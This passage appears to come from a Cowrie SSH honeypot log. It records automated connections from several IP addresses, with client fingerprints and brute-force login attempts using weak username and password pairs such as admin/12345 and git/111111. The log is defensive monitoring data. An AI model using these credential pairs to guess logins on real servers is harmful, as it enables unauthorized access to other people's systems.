om","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:06:39.304067Z","src_ip":"45.88.8.215","session":"9918bfb2ba54"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:39.465677Z","src_ip":"212.227.235.229","session":"3ecab4d392c4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:06:39.466350Z","src_ip":"212.227.235.229","session":"3ecab4d392c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Martand@123","message":"login attempt [root/Martand@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:06:40.917634Z","src_ip":"45.88.8.215","session":"9918bfb2ba54"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:41.214542Z","src_ip":"45.88.8.215","session":"9918bfb2ba54"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T12:06:41.236925Z","src_ip":"212.227.235.229","session":"3ecab4d392c4"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:42.596994Z","src_ip":"212.227.235.229","session":"3ecab4d392c4"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":36612,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d90124dbe9d","protocol":"ssh","message":"New connection: 83.168.105.65:36612 (1.2.3.4:22) [session: 8d90124dbe9d]","sensor":"my-vps","timestamp":"2025-08-26T12:06:51.223594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:51.225045Z","src_ip":"83.168.105.65","session":"8d90124dbe9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:06:51.264641Z","src_ip":"83.168.105.65","session":"8d90124dbe9d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:06:51.384944Z","src_ip":"83.168.105.65","session":"8d90124dbe9d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:52.433485Z","src_ip":"83.168.105.65","session":"8d90124dbe9d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38590,"dst_ip":"1.2.3.4","dst_port":22,"session":"393da1848855","protocol":"ssh","message":"New connection: 196.251.86.249:38590 (1.2.3.4:22) [session: 393da1848855]","sensor":"my-vps","timestamp":"2025-08-26T12:07:02.427236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:02.990881Z","src_ip":"196.251.86.249","session":"393da1848855"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:07:02.992627Z","src_ip":"196.251.86.249","session":"393da1848855"}
{"eventid":"cowrie.login.failed","username":"git","password":"111111","message":"login attempt [git/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:04.695143Z","src_ip":"196.251.86.249","session":"393da1848855"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:06.402338Z","src_ip":"196.251.86.249","session":"393da1848855"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60390,"dst_ip":"1.2.3.4","dst_port":22,"session":"91c84b2015f9","protocol":"ssh","message":"New connection: 83.168.105.65:60390 (1.2.3.4:22) [session: 91c84b2015f9]","sensor":"my-vps","timestamp":"2025-08-26T12:07:06.760689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:06.761637Z","src_ip":"83.168.105.65","session":"91c84b2015f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:07:06.801269Z","src_ip":"83.168.105.65","session":"91c84b2015f9"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:06.921641Z","src_ip":"83.168.105.65","session":"91c84b2015f9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:07.964086Z","src_ip":"83.168.105.65","session":"91c84b2015f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50834,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ba13af7dd5b","protocol":"ssh","message":"New connection: 212.227.235.229:50834 (1.2.3.4:22) [session: 7ba13af7dd5b]","sensor":"my-vps","timestamp":"2025-08-26T12:07:15.524931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:15.946086Z","src_ip":"212.227.235.229","session":"7ba13af7dd5b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:07:15.946894Z","src_ip":"212.227.235.229","session":"7ba13af7dd5b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwerty","message":"login attempt [admin/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:17.490721Z","src_ip":"212.227.235.229","session":"7ba13af7dd5b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:18.938370Z","src_ip":"212.227.235.229","session":"7ba13af7dd5b"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":51140,"dst_ip":"1.2.3.4","dst_port":22,"session":"58322a05513f","protocol":"ssh","message":"New connection: 93.123.109.189:51140 (1.2.3.4:22) [session: 58322a05513f]","sensor":"my-vps","timestamp":"2025-08-26T12:07:19.745414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:19.765746Z","src_ip":"93.123.109.189","session":"58322a05513f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:07:19.790120Z","src_ip":"93.123.109.189","session":"58322a05513f"}
{"eventid":"cowrie.login.failed","username":"hubble","password":"hubble","message":"login attempt [hubble/hubble] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:19.988106Z","src_ip":"93.123.109.189","session":"58322a05513f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:21.009400Z","src_ip":"93.123.109.189","session":"58322a05513f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48178,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9cfc40846d5","protocol":"ssh","message":"New connection: 83.168.105.65:48178 (1.2.3.4:22) [session: c9cfc40846d5]","sensor":"my-vps","timestamp":"2025-08-26T12:07:22.045051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:22.046354Z","src_ip":"83.168.105.65","session":"c9cfc40846d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:07:22.083241Z","src_ip":"83.168.105.65","session":"c9cfc40846d5"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:22.192482Z","src_ip":"83.168.105.65","session":"c9cfc40846d5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:23.230184Z","src_ip":"83.168.105.65","session":"c9cfc40846d5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":39998,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bdc473ac368","protocol":"ssh","message":"New connection: 83.168.105.65:39998 (1.2.3.4:22) [session: 3bdc473ac368]","sensor":"my-vps","timestamp":"2025-08-26T12:07:37.300867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:37.301604Z","src_ip":"83.168.105.65","session":"3bdc473ac368"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:07:37.342158Z","src_ip":"83.168.105.65","session":"3bdc473ac368"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:37.466729Z","src_ip":"83.168.105.65","session":"3bdc473ac368"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:38.509588Z","src_ip":"83.168.105.65","session":"3bdc473ac368"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39058,"dst_ip":"1.2.3.4","dst_port":22,"session":"157234dab1b9","protocol":"ssh","message":"New connection: 212.227.235.229:39058 (1.2.3.4:22) [session: 157234dab1b9]","sensor":"my-vps","timestamp":"2025-08-26T12:07:49.866848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:50.082391Z","src_ip":"212.227.235.229","session":"157234dab1b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:07:50.083134Z","src_ip":"212.227.235.229","session":"157234dab1b9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:52.163676Z","src_ip":"212.227.235.229","session":"157234dab1b9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":58138,"dst_ip":"1.2.3.4","dst_port":22,"session":"be055d02ff9b","protocol":"ssh","message":"New connection: 83.168.105.65:58138 (1.2.3.4:22) [session: be055d02ff9b]","sensor":"my-vps","timestamp":"2025-08-26T12:07:52.811881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:07:52.812996Z","src_ip":"83.168.105.65","session":"be055d02ff9b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"S